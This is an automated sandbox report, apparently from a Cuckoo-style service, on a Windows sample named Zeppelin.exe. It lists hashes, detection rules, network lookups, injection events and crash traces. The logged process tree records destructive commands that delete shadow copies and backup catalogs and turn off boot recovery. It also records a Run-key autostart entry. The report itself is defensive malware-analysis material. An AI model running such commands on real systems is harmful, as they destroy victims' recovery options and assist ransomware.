Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	April 3, 2021, 10:37 a.m.	April 3, 2021, 10:45 a.m.

Size	216.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`75c1ff39aac846286257e7186dc0096e`
SHA256	`63067c7050bab69e0903ed3887710e4fa50d30d5865c765941df579ddb9b4ab3`
CRC32	`2AF6C607`
ssdeep	`6144:/yJE1yd7WTJmcyfZmPWna4DQFu/U3buRKlemZ9DnGAevI4P9+:/U/d7WwvUPWa4DQFu/U3buRKlemZ9Dn4`
Yara	inject_thread - Code injection with CreateRemoteThread in a remote process network_http - Communications over HTTP escalate_priv - Escalade priviledges keylogger - Run a keylogger win_registry - Affect system registries win_token - Affect system token win_files_operation - Affect private profile Str_Win32_Wininet_Library - Match Windows Inet API library declaration Str_Win32_Internet_API - Match Windows Inet API call Str_Win32_Http_API - Match Windows Http API call PE_Header_Zero - PE File Signature Zero IsPE32 - (no description) IsWindowsGUI - (no description) borland_delphi - Borland Delphi 2.0 - 7.0 / 2005 - 2007

Zeppelin.exe "C:\Users\test22\AppData\Local\Temp\Zeppelin.exe"
2504
- explorer.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe" -start
  3236
  - cmd.exe "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    1160
    - WMIC.exe wmic shadowcopy delete
      7316
  - cmd.exe "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    8340
  - cmd.exe "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    8704
  - cmd.exe "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    3360
  - cmd.exe "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    5256
    - vssadmin.exe vssadmin delete shadows /all /quiet
      8628

Name	Response	Post-Analysis Lookup
www.geodatatool.com	A 158.69.65.151	158.69.65.151
geoiptool.com	A 158.69.65.151	158.69.65.151
iplogger.org	A 88.99.66.31	88.99.66.31

IP Address	Status	Action
158.69.65.151	Active	Moloch
164.124.101.2	Active	Moloch
172.217.25.14	Active	Moloch
88.99.66.31	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (8 events)

Time & API	Arguments	Status	Return
GetComputerNameW April 3, 2021, 10:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2021, 10:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2021, 10:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2021, 10:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2021, 10:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2021, 10:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA April 3, 2021, 10:37 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW April 3, 2021, 10:37 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent April 3, 2021, 10:37 a.m.			0	0

Command line console output was observed (6 events)

Time & API	Arguments	Status	Return
WriteConsoleW April 3, 2021, 10:37 a.m.	buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW April 3, 2021, 10:37 a.m.	buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW April 3, 2021, 10:37 a.m.	buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleA April 3, 2021, 10:37 a.m.	buffer: ERROR: Description = Initialization failure console_handle: 0x0000000b	1	1
WriteConsoleW April 3, 2021, 10:37 a.m.	buffer: vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool (C) Copyright 2001-2005 Microsoft Corp. console_handle: 0x00000007	1	1
WriteConsoleW April 3, 2021, 10:37 a.m.	buffer: Error: Unexpected failure: Class not registered console_handle: 0x00000007	1	1

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.itext

The executable uses a known packer (1 event)

packer

BobSoft Mini Delphi -> BoB / BobSoft

One or more processes crashed (3 events)

Time & API	Arguments	Status
__exception__ April 3, 2021, 10:37 a.m.	stacktrace: zeppelin+0x2debf @ 0x3debf zeppelin+0x2e6db @ 0x3e6db zeppelin+0x31f91 @ 0x41f91 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: df 2c 01 df 28 83 f9 08 7e 11 df 68 08 83 f9 10 exception.symbol: zeppelin+0x3031 exception.address: 0x13031 exception.module: Zeppelin.exe exception.exception_code: 0xc0000005 exception.offset: 12337 registers.esp: 4979460 registers.edi: 0 registers.eax: 0 registers.ebp: 4979516 registers.edx: 32476408 registers.ebx: 2130567168 registers.esi: 4979548 registers.ecx: 24	1
__exception__ April 3, 2021, 10:37 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 48755188 registers.edi: 4118356 registers.eax: 48755188 registers.ebp: 48755268 registers.edx: 3835700 registers.ebx: 48755552 registers.esi: 2147746133 registers.ecx: 3892496	1
__exception__ April 3, 2021, 10:37 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x72006f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x72006e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x720027a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x72002652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x7200253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x72002411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x720025ab wmic+0x39c80 @ 0x79c80 wmic+0x3b06a @ 0x7b06a wmic+0x3b1f8 @ 0x7b1f8 wmic+0x36fcd @ 0x76fcd wmic+0x3d6e9 @ 0x7d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x76a7b727 registers.esp: 3467040 registers.edi: 1957755408 registers.eax: 3467040 registers.ebp: 3467120 registers.edx: 1 registers.ebx: 3862124 registers.esi: 2147746133 registers.ecx: 3760252539	1

Time & API

Arguments

Status

Return

Repeated

__exception__

April 3, 2021, 10:37 a.m.

stacktrace:

zeppelin+0x2debf @ 0x3debf
zeppelin+0x2e6db @ 0x3e6db
zeppelin+0x31f91 @ 0x41f91
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: df 2c 01 df 28 83 f9 08 7e 11 df 68 08 83 f9 10
exception.symbol: zeppelin+0x3031
exception.address: 0x13031
exception.module: Zeppelin.exe
exception.exception_code: 0xc0000005
exception.offset: 12337
registers.esp: 4979460
registers.edi: 0
registers.eax: 0
registers.ebp: 4979516
registers.edx: 32476408
registers.ebx: 2130567168
registers.esi: 4979548
registers.ecx: 24

__exception__

April 3, 2021, 10:37 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74b24387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x74d4ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x74d46b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x74d46a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x74d65c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x74de06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x74bfd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x74bfd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x74bfddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74b18a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74b18938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x74b1950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x74bfdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x74bfdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x74bfe1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74b19367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74b19326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755b62fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x755b6d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755b77c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x755b788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x74ada48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x74ad853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x74ada4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x74aecd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x74aed87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 48755188
registers.edi: 4118356
registers.eax: 48755188
registers.ebp: 48755268
registers.edx: 3835700
registers.ebx: 48755552
registers.esi: 2147746133
registers.ecx: 3892496

__exception__

April 3, 2021, 10:37 a.m.

stacktrace:

RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x74d5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x74bff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x74d6414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x74acfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x74bfa338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x74f8e99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x74f672ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x74f5ab0d
IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x74f8c048
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x74f587f7
RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x74f58926
RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x74f5d55e
IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x74f8c44b
RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x74f5d1f6
RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x74f5d1ac
RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x74f5d40b
RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x74f5991b
RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x74f58d67
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x74f5a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x74f59b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x74f59aa8
DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x72006f4f
DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x72006e40
DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x720027a4
DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x72002652
DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x7200253d
DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x72002411
DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x720025ab
wmic+0x39c80 @ 0x79c80
wmic+0x3b06a @ 0x7b06a
wmic+0x3b1f8 @ 0x7b1f8
wmic+0x36fcd @ 0x76fcd
wmic+0x3d6e9 @ 0x7d6e9
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x76a7b727
registers.esp: 3467040
registers.edi: 1957755408
registers.eax: 3467040
registers.ebp: 3467120
registers.edx: 1
registers.ebx: 3862124
registers.esi: 2147746133
registers.ecx: 3760252539

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET http://geoiptool.com/
suspicious_features	GET method with no useragent header				suspicious_request	GET https://www.geodatatool.com/

Performs some HTTP requests (4 events)

request	GET http://geoiptool.com/
request	GET http://iplogger.org/1icnt7.tgz
request	GET https://www.geodatatool.com/
request	GET https://iplogger.org/1icnt7.tgz

Allocates read-write-execute memory (usually to unpack itself) (1 event)

Time & API	Arguments	Status	Return	Repeated
NtProtectVirtualMemory April 3, 2021, 10:37 a.m.	process_identifier: 7316 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73d31000 process_handle: 0xffffffff	1	0	0

Looks up the external IP address (1 event)

domain

geoiptool.com

Creates a suspicious process (6 events)

cmdline	"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
cmdline	"C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
cmdline	"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
cmdline	"C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
cmdline	"C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
cmdline	wmic shadowcopy delete

Executes one or more WMI queries (1 event)

wmi	SELECT * FROM Win32_ShadowCopy

The binary likely contains encrypted or compressed data indicative of a packer (1 event)

section

{u'size_of_data': u'0x00002000', u'virtual_address': u'0x00030000', u'entropy': 7.677533135070579, u'name': u'.itext', u'virtual_size': u'0x00001f98'}

entropy

7.67753313507

description

A section with a high entropy has been found

Checks for the Locally Unique Identifier on the system for a suspicious privilege (3 events)

Time & API	Arguments	Status	Return
LookupPrivilegeValueW April 3, 2021, 10:37 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 3, 2021, 10:37 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1
LookupPrivilegeValueW April 3, 2021, 10:37 a.m.	system_name: privilege_name: SeBackupPrivilege	1	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	"C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
cmdline	wmic shadowcopy delete

Communicates with host for which no DNS query was performed (1 event)

host

172.217.25.14

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory April 3, 2021, 10:37 a.m.	process_identifier: 7400 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004dc	1
NtAllocateVirtualMemory April 3, 2021, 10:37 a.m.	process_identifier: 7400 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004dc	1
NtAllocateVirtualMemory April 3, 2021, 10:37 a.m.	process_identifier: 7400 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004dc	1

Installs itself for autorun at Windows startup (1 event)

reg_key

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\explorer.exe

reg_value

"C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe" -start

Deletes executed files from disk (1 event)

file	C:\Users\test22\AppData\Roaming\Microsoft\Windows\explorer.exe

Creates a thread using CreateRemoteThread in a non-child process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2504 created a remote thread in non-child process 7400
CreateRemoteThread April 3, 2021, 10:37 a.m.	thread_identifier: 4232 process_identifier: 7400 function_address: 0x00110000 flags: 0 stack_size: 0 parameter: 0x00100000 process_handle: 0x000004dc	1	1464	0

Manipulates memory of a non-child process indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2504 manipulating memory of non-child process 7400
NtAllocateVirtualMemory April 3, 2021, 10:37 a.m.	process_identifier: 7400 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000b0000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004dc	1	0	0
NtAllocateVirtualMemory April 3, 2021, 10:37 a.m.	process_identifier: 7400 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00100000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004dc	1	0	0
NtAllocateVirtualMemory April 3, 2021, 10:37 a.m.	process_identifier: 7400 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00110000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x000004dc	1	0	0

Network communications indicative of possible code injection originated from the process explorer.exe (2 events)

Time & API	Arguments	Status	Return	Repeated
InternetConnectA April 3, 2021, 10:37 a.m.	username: service: 3 hostname: iplogger.org internet_handle: 0x00cc0004 flags: 0 password: port: 80	1	13369352	0
HttpOpenRequestA April 3, 2021, 10:37 a.m.	connect_handle: 0x00cc0008 http_version: flags: 3 http_method: GET referer: path: 1icnt7.tgz	1	13369356	0

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2504 injected into non-child 7400
WriteProcessMemory April 3, 2021, 10:37 a.m.	buffer: C:\Users\test22\AppData\Local\Temp\Zeppelin.exe base_address: 0x000b0000 process_identifier: 7400 process_handle: 0x000004dc	1	1	0
WriteProcessMemory April 3, 2021, 10:37 a.m.	buffer: ³suzsuÿsu base_address: 0x00100000 process_identifier: 7400 process_handle: 0x000004dc	1	1	0
WriteProcessMemory April 3, 2021, 10:37 a.m.	buffer: UìÄðVWEð}ð¥¥¥¥hèÿUøÿuüÿUðøtíhÎúÞÿUô_^å]ÂUìÄØSVW3ÒUØUÜUàUüØ3ÀUh¡Ðdÿ0d Û7Uà¸¸Ðè2þÿEàèX\|ýÿPhäÐè=ýÿPè?ýÿEäUÜ¸üÐès2þÿEÜè/\|ýÿPhäÐèýÿPèýÿEèUØ¸0ÑèJ2þÿEØè\|ýÿPhäÐèëýÿPèíýÿEìUü3Àèü(þÿj@h0EüèEýÿÀ@PjSè¥ýÿðuðEøPEüè(ýÿÀ@PEüèýÿPVSè ýÿj@h0jjSèoýÿðEøPjEäPVSè\|ýÿ}øuHj@h0hôjSèBýÿøEøPhôhàÎWSèKýÿ}øôuEôPjVWjjSèýÿÀ3ÀZYYdh¨ÐEØºèÔvýÿEüèÜ}ýÿÃéVoýÿëã_^[å]Ãÿÿÿÿ+ö1Pµ~{º wÔ>Äsý¾P³ãD base_address: 0x00110000 process_identifier: 7400 process_handle: 0x000004dc	1	1	0

Modifies boot configuration settings (2 events)

command	"c:\windows\system32\cmd.exe" /c bcdedit /set {default} recoveryenabled no
